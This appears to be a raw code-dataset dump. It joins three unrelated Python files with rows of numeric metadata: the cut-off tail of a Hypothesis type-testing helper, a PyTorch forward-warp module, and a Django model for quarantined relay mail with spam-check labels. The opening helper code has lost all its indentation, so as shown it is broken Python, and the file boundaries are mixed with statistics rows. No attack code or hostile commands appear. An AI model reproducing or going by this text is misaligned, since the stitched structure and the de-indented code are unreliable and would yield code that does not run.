tuple_valids: dict[int, set[SearchStrategy[Any]]] = {}
tuple_invalids: dict[int, set[SearchStrategy[Any]]] = {}
dict_key_valids: set[SearchStrategy[Any]] = set()
dict_key_invalids: set[SearchStrategy[Any]] = set()
dict_val_valids: set[SearchStrategy[Any]] = set()
dict_val_invalids: set[SearchStrategy[Any]] = set()
list_invalids: set[SearchStrategy[Any]] = set()
set_invalids: set[SearchStrategy[Any]] = set()
iterable_invalids: set[SearchStrategy[Any]] = set()
annotation = annotation.replace('RealVector', 'Sequence[float]')
for type_str in annotation.split('|'):
type_str = type_str.strip()
if type_str == 'None':
types_to_avoid.add(type(None))
elif type_str == 'int':
types_to_avoid.add(int)
types_to_avoid.add(np.byte)
types_to_avoid.add(np.short)
types_to_avoid.add(np.intc)
types_to_avoid.add(np.longlong)
types_to_avoid.add(np.int8)
types_to_avoid.add(np.int16)
types_to_avoid.add(np.int32)
types_to_avoid.add(np.int64)
elif type_str == 'float':
types_to_avoid.add(float)
types_to_avoid.add(np.half)
types_to_avoid.add(np.single)
types_to_avoid.add(np.double)
types_to_avoid.add(np.longdouble)
types_to_avoid.add(np.float32)
types_to_avoid.add(np.float64)
elif type_str == 'complex':
types_to_avoid.add(complex)
types_to_avoid.add(np.csingle)
types_to_avoid.add(np.cdouble)
types_to_avoid.add(np.clongdouble)
types_to_avoid.add(np.complex64)
types_to_avoid.add(np.complex128)
elif type_str == 'bool':
types_to_avoid.add(bool)
types_to_avoid.add(np.bool_)
elif type_str == 'str':
types_to_avoid.add(str)
elif type_str == 'Any':
continue
elif type_str.lower().startswith('tuple'):
args = _split_generic_arguments(type_str[6:-1])
if len(args) not in tuple_valids:
tuple_valids[len(args)] = set()
tuple_invalids[len(args)] = set()
for arg in args:
valid_strat = type_annotation_to_valid_strategy(arg)
invalid_strat = type_annotation_to_invalid_strategy(arg)
tuple_valids[len(args)].add(valid_strat)
tuple_invalids[len(args)].add(invalid_strat)
types_to_avoid.add(tuple)
elif type_str.lower().startswith('dict'):
args = _split_generic_arguments(type_str[5:-1])
dict_key_valids.add(type_annotation_to_valid_strategy(args[0]))
dict_key_invalids.add(type_annotation_to_valid_strategy(args[1]))
dict_val_valids.add(type_annotation_to_invalid_strategy(args[0]))
dict_val_invalids.add(type_annotation_to_invalid_strategy(args[1]))
types_to_avoid.add(dict)
types_to_avoid.add(map)
elif type_str.lower().startswith('mapping'):
args = _split_generic_arguments(type_str[8:-1])
dict_key_valids.add(type_annotation_to_valid_strategy(args[0]))
dict_key_invalids.add(type_annotation_to_valid_strategy(args[1]))
dict_val_valids.add(type_annotation_to_invalid_strategy(args[0]))
dict_val_invalids.add(type_annotation_to_invalid_strategy(args[1]))
types_to_avoid.add(dict)
types_to_avoid.add(map)
elif type_str.lower().startswith('list'):
arg_strat = type_annotation_to_invalid_strategy(type_str[5:-1])
list_invalids.add(arg_strat)
types_to_avoid.add(list)
elif type_str.lower().startswith('set'):
arg_strat = type_annotation_to_invalid_strategy(type_str[4:-1])
set_invalids.add(arg_strat)
types_to_avoid.add(set)
types_to_avoid.add(collections.abc.MutableSet)
elif type_str.lower().startswith('sequence'):
arg_strat = type_annotation_to_invalid_strategy(type_str[9:-1])
list_invalids.add(arg_strat)
types_to_avoid.add(Sequence)
types_to_avoid.add(list)
types_to_avoid.add(tuple)
types_to_avoid.add(bytearray)
types_to_avoid.add(bytes)
elif type_str.lower().startswith('iterable'):
arg_strat = type_annotation_to_invalid_strategy(type_str[9:-1])
iterable_invalids.add(arg_strat)
types_to_avoid.add(Sequence)
types_to_avoid.add(list)
types_to_avoid.add(tuple)
types_to_avoid.add(Iterable)
types_to_avoid.add(set)
types_to_avoid.add(frozenset)
types_to_avoid.add(dict)
types_to_avoid.add(str)
types_to_avoid.add(bytearray)
types_to_avoid.add(bytes)
types_to_avoid.add(collections.abc.MutableSet)
types_to_avoid.add(enumerate)
types_to_avoid.add(map)
types_to_avoid.add(range)
types_to_avoid.add(reversed)
elif type_str.lower().startswith('intervallike'):
types_to_avoid.add(tuple)
elif type_str.lower().startswith('cycleinterval'):
continue
elif type_str.lower().startswith('circuitpointlike'):
types_to_avoid.add(tuple)
elif type_str.lower().startswith('circuitpoint'):
continue
elif type_str.lower().startswith('circuitregionlike'):
types_to_avoid.add(dict)
elif type_str.lower().startswith('circuitregion'):
continue
elif type_str.lower().startswith('circuitlocationlike'):
types_to_avoid.add(int)
types_to_avoid.add(Sequence)
types_to_avoid.add(Iterable)
types_to_avoid.add(list)
types_to_avoid.add(tuple)
types_to_avoid.add(collections.abc.MutableSet)
types_to_avoid.add(enumerate)
types_to_avoid.add(range)
types_to_avoid.add(reversed)
elif type_str.lower().startswith('circuitlocation'):
continue
elif type_str.lower().startswith('unitarylike'):
types_to_avoid.add(np.ndarray)
elif type_str.lower().startswith('unitarymatrix'):
continue
elif type_str.lower().startswith('gate'):
continue
elif type_str.lower().startswith('operation'):
continue
elif type_str.lower().startswith('circuit'):
continue
else:
raise ValueError(f'Cannot generate strategy for type: {type_str}')
strategies.append(everything_except(tuple(types_to_avoid)))
for tuple_len in tuple_valids:
for valid_set in _powerset(list(range(tuple_len))): # (), (0,), (1,)
strategy_builder = []
for i in range(tuple_len):
if i in valid_set:
strat = one_of(list(tuple_valids[tuple_len]))
strategy_builder.append(strat)
else:
strat = one_of(list(tuple_invalids[tuple_len]))
strategy_builder.append(strat)
strategies.append(tuples(*strategy_builder))
if len(dict_val_invalids) > 0:
strategies.append(
dictionaries(
one_of(list(dict_key_valids)),
one_of(list(dict_val_invalids)),
min_size=1,
),
)
strategies.append(
dictionaries(
one_of(list(dict_key_invalids)),
one_of(list(dict_val_valids)),
min_size=1,
),
)
strategies.append(
dictionaries(
one_of(list(dict_key_invalids)),
one_of(list(dict_val_invalids)),
min_size=1,
),
)
if len(list_invalids) > 0:
strategies.append(lists(one_of(list(list_invalids)), min_size=1))
if len(set_invalids) > 0:
strategies.append(sets(one_of(list(set_invalids)), min_size=1))
if len(iterable_invalids) > 0:
strategies.append(
iterables(
one_of(
list(iterable_invalids),
),
min_size=1,
),
)
return one_of(strategies)
def invalid_type_test(
    func_to_test: Callable[..., Any],
    other_allowed_errors: list[type] = [],
) -> Callable[..., Callable[..., None]]:
    """
    Decorator to generate invalid type tests.

    An invalid type test ensures that a function called with incorrect types
    does raise a TypeError.

    Examples:
        >>> class Foo:
        ...     def foo(self, x: int, y: int) -> None:
        ...         if not is_integer(x):
        ...             raise TypeError("")
        ...         if not is_integer(y):
        ...             raise TypeError("")

        >>> class TestFoo:
        ...     @invalid_type_test(Foo().foo)
        ...     def test_foo_invalid_type(self) -> None:
        ...         pass

        >>> @invalid_type_test(Foo().foo)
        ... def test_foo_invalid_type(self) -> None:
        ...     pass
    """
    if sys.version_info[0] == 3 and sys.version_info[1] < 9:
        return lambda x: x

    valids = []
    invalids = []
    for id, param in inspect.signature(func_to_test).parameters.items():
        if param.annotation == inspect._empty:  # type: ignore
            raise ValueError(
                'Need type annotation to generate invalid type tests.',
            )
        valids.append(type_annotation_to_valid_strategy(param.annotation))
        invalids.append(type_annotation_to_invalid_strategy(param.annotation))

    strategies = []
    for valid_set in _powerset(list(range(len(valids)))):
        strategy_builder = []
        for i in range(len(valids)):
            if i in valid_set:
                strategy_builder.append(valids[i])
            else:
                strategy_builder.append(invalids[i])
        strategies.append(tuples(*strategy_builder))

    def inner(f: Callable[..., Any]) -> Callable[..., None]:
        if 'self' in inspect.signature(f).parameters:
            @pytest.mark.parametrize('strategy', strategies)
            @given(data=data())
            def invalid_type_test(self: Any, strategy: Any, data: Any) -> None:
                args = data.draw(strategy)
                with pytest.raises((TypeError,) + tuple(other_allowed_errors)):
                    func_to_test(*args)
            return invalid_type_test
        else:
            @pytest.mark.parametrize('strategy', strategies)
            @given(data=data())
            def invalid_type_test(strategy: Any, data: Any) -> None:
                args = data.draw(strategy)
                with pytest.raises((TypeError,) + tuple(other_allowed_errors)):
                    func_to_test(*args)
            return invalid_type_test

    return inner
def valid_type_test(
    func_to_test: Callable[..., Any],
) -> Callable[..., Callable[..., None]]:
    """
    Decorator to generate valid type tests.

    A valid type test ensures that a function called with correct types
    does not raise a TypeError.

    Examples:
        >>> class Foo:
        ...     def foo(self, x: int, y: int) -> None:
        ...         if not is_integer(x):
        ...             raise TypeError("")
        ...         if not is_integer(y):
        ...             raise TypeError("")

        >>> class TestFoo:
        ...     @valid_type_test(Foo().foo)
        ...     def test_foo_valid_type(self) -> None:
        ...         pass

        >>> @valid_type_test(Foo().foo)
        ... def test_foo_valid_type(self) -> None:
        ...     pass
    """
    if sys.version_info[0] == 3 and sys.version_info[1] < 9:
        return lambda x: x

    strategies = []
    for id, param in inspect.signature(func_to_test).parameters.items():
        if param.annotation == inspect._empty:  # type: ignore
            raise ValueError(
                'Need type annotation to generate invalid type tests.',
            )
        strategies.append(type_annotation_to_valid_strategy(param.annotation))
    strategy = tuples(*strategies)

    def inner(f: Callable[..., Any]) -> Callable[..., None]:
        if 'self' in inspect.signature(f).parameters:
            @given(data=strategy)
            def valid_type_test(self: Any, data: Any) -> None:
                try:
                    func_to_test(*data)
                except TypeError:
                    assert False, 'Valid types caused TypeError.'
                except Exception:
                    pass
            return valid_type_test
        else:
            @given(data=strategy)
            def valid_type_test(data: Any) -> None:
                try:
                    func_to_test(*data)
                except TypeError:
                    assert False, 'Valid types caused TypeError.'
                except Exception:
                    pass
            return valid_type_test

    return inner
| 35.893103 | 80 | 0.619944 | 2,423 | 20,818 | 5.069336 | 0.101114 | 0.043312 | 0.06741 | 0.08182 | 0.745176 | 0.663926 | 0.518603 | 0.459904 | 0.446634 | 0.395262 | 0 | 0.007074 | 0.273417 | 20,818 | 579 | 81 | 35.955095 | 0.804972 | 0.083533 | 0 | 0.576555 | 1 | 0 | 0.044647 | 0 | 0 | 0 | 0 | 0 | 0.004785 | 1 | 0.028708 | false | 0.004785 | 0.098086 | 0 | 0.157895 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
33a9e48d845125b9644014be228bb6ef28ca1951 | 4,743 | py | Python | Forward_Warp/python/forward_warp_python.py | hologerry/Forward-Warp | 82a32a372383b3c69f9666cb5b8189dbfb05d328 | [
"MIT"
] | 81 | 2019-07-04T20:51:34.000Z | 2022-03-26T15:58:42.000Z | Forward_Warp/python/forward_warp_python.py | wbhu/Forward-Warp | 90e7e32f2c0e666ffc029b7b274b30b3a45cd3ce | [
"MIT"
] | 9 | 2020-05-04T04:59:16.000Z | 2021-12-21T19:06:31.000Z | Forward_Warp/python/forward_warp_python.py | wbhu/Forward-Warp | 90e7e32f2c0e666ffc029b7b274b30b3a45cd3ce | [
"MIT"
] | 9 | 2019-09-04T02:09:12.000Z | 2021-11-27T09:31:49.000Z | import torch
from torch.nn import Module, Parameter
from torch.autograd import Function
class Forward_Warp_Python:
    @staticmethod
    def forward(im0, flow, interpolation_mode):
        im1 = torch.zeros_like(im0)
        B = im0.shape[0]
        H = im0.shape[2]
        W = im0.shape[3]
        if interpolation_mode == 0:
            for b in range(B):
                for h in range(H):
                    for w in range(W):
                        x = w + flow[b, h, w, 0]
                        y = h + flow[b, h, w, 1]
                        nw = (int(torch.floor(x)), int(torch.floor(y)))
                        ne = (nw[0]+1, nw[1])
                        sw = (nw[0], nw[1]+1)
                        se = (nw[0]+1, nw[1]+1)
                        p = im0[b, :, h, w]
                        if nw[0] >= 0 and se[0] < W and nw[1] >= 0 and se[1] < H:
                            nw_k = (se[0]-x)*(se[1]-y)
                            ne_k = (x-sw[0])*(sw[1]-y)
                            sw_k = (ne[0]-x)*(y-ne[1])
                            se_k = (x-nw[0])*(y-nw[1])
                            im1[b, :, nw[1], nw[0]] += nw_k*p
                            im1[b, :, ne[1], ne[0]] += ne_k*p
                            im1[b, :, sw[1], sw[0]] += sw_k*p
                            im1[b, :, se[1], se[0]] += se_k*p
        else:
            round_flow = torch.round(flow)
            for b in range(B):
                for h in range(H):
                    for w in range(W):
                        x = w + int(round_flow[b, h, w, 0])
                        y = h + int(round_flow[b, h, w, 1])
                        if x >= 0 and x < W and y >= 0 and y < H:
                            im1[b, :, y, x] = im0[b, :, h, w]
        return im1

    @staticmethod
    def backward(grad_output, im0, flow, interpolation_mode):
        B = grad_output.shape[0]
        C = grad_output.shape[1]
        H = grad_output.shape[2]
        W = grad_output.shape[3]
        im0_grad = torch.zeros_like(grad_output)
        flow_grad = torch.empty([B, H, W, 2])
        if interpolation_mode == 0:
            for b in range(B):
                for h in range(H):
                    for w in range(W):
                        x = w + flow[b, h, w, 0]
                        y = h + flow[b, h, w, 1]
                        x_f = int(torch.floor(x))
                        y_f = int(torch.floor(y))
                        x_c = x_f+1
                        y_c = y_f+1
                        nw = (x_f, y_f)
                        ne = (x_c, y_f)
                        sw = (x_f, y_c)
                        se = (x_c, y_c)
                        p = im0[b, :, h, w]
                        if nw[0] >= 0 and se[0] < W and nw[1] >= 0 and se[1] < H:
                            nw_k = (se[0]-x)*(se[1]-y)
                            ne_k = (x-sw[0])*(sw[1]-y)
                            sw_k = (ne[0]-x)*(y-ne[1])
                            se_k = (x-nw[0])*(y-nw[1])
                            nw_grad = grad_output[b, :, nw[1], nw[0]]
                            ne_grad = grad_output[b, :, ne[1], ne[0]]
                            sw_grad = grad_output[b, :, sw[1], sw[0]]
                            se_grad = grad_output[b, :, se[1], se[0]]
                            im0_grad[b, :, h, w] += nw_k*nw_grad
                            im0_grad[b, :, h, w] += ne_k*ne_grad
                            im0_grad[b, :, h, w] += sw_k*sw_grad
                            im0_grad[b, :, h, w] += se_k*se_grad
                            flow_grad_x = torch.zeros(C)
                            flow_grad_y = torch.zeros(C)
                            flow_grad_x -= (y_c-y)*p*nw_grad
                            flow_grad_y -= (x_c-x)*p*nw_grad
                            flow_grad_x += (y_c-y)*p*ne_grad
                            flow_grad_y -= (x-x_f)*p*ne_grad
                            flow_grad_x -= (y-y_f)*p*sw_grad
                            flow_grad_y += (x_c-x)*p*sw_grad
                            flow_grad_x += (y-y_f)*p*se_grad
                            flow_grad_y += (x-x_f)*p*se_grad
                            flow_grad[b, h, w, 0] = torch.sum(flow_grad_x)
                            flow_grad[b, h, w, 1] = torch.sum(flow_grad_y)
        else:
            round_flow = torch.round(flow)
            for b in range(B):
                for h in range(H):
                    for w in range(W):
                        x = w + int(round_flow[b, h, w, 0])
                        y = h + int(round_flow[b, h, w, 1])
                        if x >= 0 and x < W and y >= 0 and y < H:
                            im0_grad[b, :, h, w] = grad_output[b, :, y, x]
        return im0_grad, flow_grad
| 46.5 | 81 | 0.356525 | 668 | 4,743 | 2.360778 | 0.080838 | 0.024096 | 0.036145 | 0.03551 | 0.558022 | 0.462904 | 0.426126 | 0.409639 | 0.344959 | 0.344959 | 0 | 0.044055 | 0.507063 | 4,743 | 101 | 82 | 46.960396 | 0.630453 | 0 | 0 | 0.428571 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.020408 | false | 0 | 0.030612 | 0 | 0.081633 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
33b43ed36a9638956d846bca8d46fb665ecc2a68 | 2,295 | py | Python | e/mail-relay/web/apps/localized_mail/models.py | zhouli121018/nodejsgm | 0ccbc8acf61badc812f684dd39253d55c99f08eb | [
"MIT"
] | null | null | null | e/mail-relay/web/apps/localized_mail/models.py | zhouli121018/nodejsgm | 0ccbc8acf61badc812f684dd39253d55c99f08eb | [
"MIT"
] | 18 | 2020-06-05T18:17:40.000Z | 2022-03-11T23:25:21.000Z | e/mail-relay/web/apps/localized_mail/models.py | zhouli121018/nodejsgm | 0ccbc8acf61badc812f684dd39253d55c99f08eb | [
"MIT"
] | null | null | null | #coding=utf-8
import os
from django.db import models
from django.contrib.auth.models import User
from django.conf import settings
from apps.core.models import Customer
CHECK_RESULT = (
    ('', '--'),
    ('high_risk', u'高危邮件'),
    ('sender_blacklist', u'发件黑'),
    ('keyword_blacklist', u'内容黑'),
    ('subject_blacklist', u'主题黑'),
    ('subject_and_keyword', u'主题和内容关键字'),
    ('cyber_spam', u'CYBER-Spam'),
    ('spamassassin', u'垃邮(spamassassin)'),
    ('error', u'检测出错'),
    ('c_sender_blacklist', u'发件人黑名单'),
)
MAIL_STATE = (
    ('', '--'),
    ('review', u'等待审核'),
    ('pass', u'审核已通过'),
    ('reject', u'审核已拒绝'),
    ('passing', u'审核通过中'),
    ('rejecting', u'审核拒绝中'),
)
MAIL_ORIGIN = (
    ('', '--'),
    ('collect', u'网关'),
    ('relay', u'中继'),
)


class LocalizedMail(models.Model):
    customer = models.ForeignKey(Customer, on_delete=models.DO_NOTHING, null=True, blank=True)
    check_result = models.CharField(u'检测结果', max_length=20, null=True, blank=True, choices=CHECK_RESULT, db_index=True)
    check_message = models.TextField(u'检测详细结果', null=True, blank=True)
    created = models.DateTimeField(u'创建日期', auto_now_add=True)
    mail_from = models.CharField(u'发件人', max_length=150, null=True, blank=True)
    mail_to = models.CharField(u'收件人', max_length=150, null=True, blank=True)
    subject = models.CharField(u'主题', max_length=800, null=True, blank=True)
    state = models.CharField(u'状态', max_length=20, default='review', choices=MAIL_STATE, db_index=True)
    size = models.IntegerField(u'邮件大小', default=0)
    reviewer = models.ForeignKey(User, on_delete=models.DO_NOTHING, null=True, blank=True)
    review_time = models.DateTimeField(u'审核时间', null=True, blank=True)
    mail_id = models.CharField(u'客户邮件ID', max_length=20, null=True, blank=True)
    origin = models.CharField(u'来源', max_length=20, choices=MAIL_ORIGIN, default='collect', db_index=True)
    created_date = models.DateField(u'创建日期', auto_now_add=True, db_index=True)

    def get_mail_content(self):
        file_path = self.get_mail_path()
        return open(file_path, 'r').read() if os.path.exists(file_path) else ''

    def get_mail_path(self):
        print os.path.join(settings.DATA_LOCALIZED_PATH, str(self.id))
        return os.path.join(settings.DATA_LOCALIZED_PATH, str(self.id))
| 38.898305 | 119 | 0.67756 | 325 | 2,295 | 4.618462 | 0.375385 | 0.047968 | 0.077948 | 0.101932 | 0.229847 | 0.213191 | 0.187875 | 0.111925 | 0.111925 | 0.058628 | 0 | 0.009769 | 0.152505 | 2,295 | 58 | 120 | 39.568966 | 0.761954 | 0.005229 | 0 | 0.058824 | 0 | 0 | 0.138475 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0.039216 | 0.098039 | null | null | 0.019608 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |